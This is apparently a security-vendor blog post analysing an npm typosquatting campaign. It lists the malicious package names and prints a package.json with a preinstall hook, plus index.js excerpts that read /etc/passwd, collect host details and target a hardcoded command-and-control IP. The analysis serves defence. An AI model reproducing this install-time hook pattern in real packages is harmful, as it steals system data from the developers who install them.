New Blog: npm SANDWORM_MODE attack step-by-step malware analysis
Edit Calendar Icon 21 Feb 2026
SafeDep Logo
Back to Blog

npm - The Playground for Malicious Packages

SafeDep Team
2 min read

Table of Contents

Today our OSS package malware analysis bot picked up a new campaign targeting developers using npm. The campaign involves publishing multiple npm packages that impersonate popular package names. These packages are being used to collect basic system information and the contents of /etc/passwd file from the infected systems.

Our system picked up the following packages with very similar behaviour matching common information gathering techniques:

Package NameVersion
themes-vendor0.0.1
x509-escaping0.0.1
keycloak-server0.0.1
module-stub0.0.1
keycloak-server0.0.3
postject-copy0.0.0
micrometer-docs0.0.3
orbit-playroom0.0.0
x509-escaping0.0.0
weekendfe0.0.1
themes-vendor0.0.0

npm promptly removed these packages from the registry. This was possible because no other package depended on these malicious packages. All packages had a similar payload that was being executed when the package was installed. For example, themes-vendor shipped a package.json file with the following

{
  "name": "themes-vendor",
  "version": "0.0.1",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "preinstall": "node index.js"
  },
  "author": "",
  "license": "ISC"
}

The preinstall script in the package.json file executed the index.js script which in turn executed the following code:

[...]
const apiHostname = '13.60.183.44';
const apiPort = 5000;
const apiPath = '/submit';


// [...]
let whoamiInfo = '';
try {
  // Execute the 'whoami' command and trim the output
  whoamiInfo = execSync('cat /etc/passwd', { encoding: 'utf-8' }).trim();
} catch (error) {
  whoamiInfo = `Error executing whoami: ${error.message}`;
}


// [...]
const deviceInfo = {
  platform: os.platform(),
  release: os.release(),
  hostname: os.hostname(),
  arch: os.arch(),
  userInfo: os.userInfo(),
  networkInterfaces: os.networkInterfaces(),
  whoamiinfo: whoamiInfo,
  user: 'themes-vendor',
};

The command and control IP 13.60.183.44 belongs to AWS which along with the nature of the payload suggests that this campaign is a possible red-team or security research activity.

Terminal window
NetRange:       13.60.0.0 - 13.63.255.255
CIDR:           13.60.0.0/14
NetName:        AMAZO-4
NetHandle:      NET-13-60-0-0-1
Parent:         NET13 (NET-13-0-0-0-0)
NetType:        Direct Allocation
OriginAS:
Organization:   Amazon.com, Inc. (AMAZO-4)
RegDate:        2022-10-11
Updated:        2022-10-11
Ref:            https://rdap.arin.net/registry/ip/13.60.0.0

Conclusion

This campaign appears to be a playground for the attackers or possible red-teamers to test their malware distribution techniques. While the payload does not appear to be sophisticated or damaging, it still highlights the very real threat of malicious packages impersonating popular package names.

  • npm
  • malware

Author

SafeDep Logo

SafeDep Team

safedep.io

Share

The Latest from SafeDep blogs

Follow for the latest updates and insights on open source security & engineering

View All Blogs
Background
SafeDep Logo

Ship Code

Not Malware

Install the SafeDep GitHub App to keep malicious packages out of your repos.

GitHub Install GitHub App